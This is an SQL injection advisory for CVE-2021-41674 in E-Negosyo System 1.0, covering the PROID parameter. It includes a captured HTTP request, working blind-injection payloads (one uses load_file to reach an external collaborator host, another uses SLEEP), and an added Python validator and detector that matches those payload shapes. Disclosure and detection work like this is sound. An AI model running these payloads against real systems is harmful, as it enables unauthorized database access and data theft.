CVE-2021-41674
Description:
The PROID parameter of the E-Negosyo System 1.0 app appears to be vulnerable to SQL injection of two types: time-based blind and boolean-based blind.
The payload '+(select load_file('\\4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net\juc'))+' was submitted in the PROID parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path pointing at a host on an external domain. The application interacted with that domain (an out-of-band lookup from the database server), indicating that the injected SQL query was executed.
HTTP request (carrying the MySQL payload):
POST /bsenordering/cart/controller.php?action=add HTTP/1.1
Host: 192.168.1.2
Origin: http://192.168.1.2
Cookie: PHPSESSID=n2krmhjsahctm8bpj44kms36b4
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.2/bsenordering/index.php?q=product
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 57

PROPRICE=50&PROQTY=10&PROID=201735'%2b(select%20load_file('%5c%5c%5c%5c4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net%5c%5cjuc'))%2b'&btnorder=%C2%9E%C3%A9e

HTTP response:
HTTP/1.1 200 OK
Date: Sat, 30 Oct 2021 06:28:29 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Payloads
---
Parameter: PROID (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: PROPRICE=50&PROQTY=10&PROID=201735'+(select load_file('\\\\4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net\\juc'))+'' OR NOT 5430=5430#&btnorder=%C2%9E%C3%A9e
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: PROPRICE=50&PROQTY=10&PROID=201735'+(select load_file('\\\\4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net\\juc'))+'' AND (SELECT 8860 FROM (SELECT(SLEEP(5)))cikV)-- oroY&btnorder=%C2%9E%C3%A9e
---
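As an added example (not part of the advisory and not the project's code), a Python helper that applies the integer check the vulnerable controller lacks and classifies a raw POST body against the payload shapes listed above. The allowlisted host, the benign body and the two shortened probe bodies are constructed assumptions; only ADVISORY_BODY is taken from the request shown.

```python
import re
from urllib.parse import parse_qs, urlencode

# Hosts the application may legitimately reference (constructed allowlist).
TRUSTED_HOSTS = {"192.168.1.2"}

# Signatures of the advisory's payload shapes, matched after URL decoding.
LOAD_FILE_UNC = re.compile(r"load_file\s*\(\s*'\\\\+([^\\']+)", re.IGNORECASE)
SLEEP_CALL = re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.IGNORECASE)
BOOLEAN_TAIL = re.compile(r"\b(?:OR|AND)\s+(?:NOT\s+)?\d+=\d+", re.IGNORECASE)

# Sample bodies: ADVISORY_BODY is the raw body of the request above; the other
# three are constructed here (a benign order, and the SLEEP / OR NOT clauses
# of the two sqlmap payloads without their load_file() prefix).
ADVISORY_BODY = ("PROPRICE=50&PROQTY=10&PROID=201735'%2b(select%20load_file('%5c%5c%5c%5c"
                 "4x2hh1o010l184bd0ql510xgq7w0kw8nbb3yvmk.nu11secur1tycollaborator.net"
                 "%5c%5cjuc'))%2b'&btnorder=%C2%9E%C3%A9e")
BENIGN_BODY = "PROPRICE=50&PROQTY=10&PROID=201735&btnorder=order"
TIME_BODY = urlencode({"PROPRICE": "50", "PROQTY": "10", "btnorder": "order",
                       "PROID": "201735'' AND (SELECT 8860 FROM (SELECT(SLEEP(5)))cikV)-- oroY"})
BOOL_BODY = urlencode({"PROPRICE": "50", "PROQTY": "10", "btnorder": "order",
                       "PROID": "201735'' OR NOT 5430=5430#"})


def validate_proid(value: str) -> int:
    """The server-side check the vulnerable controller lacks: PROID must be a
    plain positive integer, rejected before it can reach the SQL layer."""
    if not re.fullmatch(r"[1-9]\d{0,9}", value):
        raise ValueError(f"PROID is not a numeric product id: {value[:40]!r}")
    return int(value)


def detect_proid_injection(raw_body: str) -> list[str]:
    """Classify a raw application/x-www-form-urlencoded body. An empty list
    means every PROID value looked like a legitimate product id."""
    findings: list[str] = []
    for proid in parse_qs(raw_body, keep_blank_values=True).get("PROID", []):
        try:
            validate_proid(proid)
            continue  # well-formed id, nothing to report
        except ValueError as exc:
            findings.append(str(exc))
        unc = LOAD_FILE_UNC.search(proid)
        if unc and unc.group(1) not in TRUSTED_HOSTS:
            findings.append(f"out-of-band load_file() UNC path to {unc.group(1)}")
        if SLEEP_CALL.search(proid):
            findings.append("time-based blind probe (SLEEP)")
        if BOOLEAN_TAIL.search(proid):
            findings.append("boolean-based blind probe (N=N tautology)")
    return findings
```

The same validate_proid check, or a prepared statement with PROID bound as an integer, is the fix on the application side; the detector is for reviewing web logs or request captures.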
Reproduce:
NOTE:
- The PoC, a.k.a. CVE-SQL.py, is encrypted for security reasons!
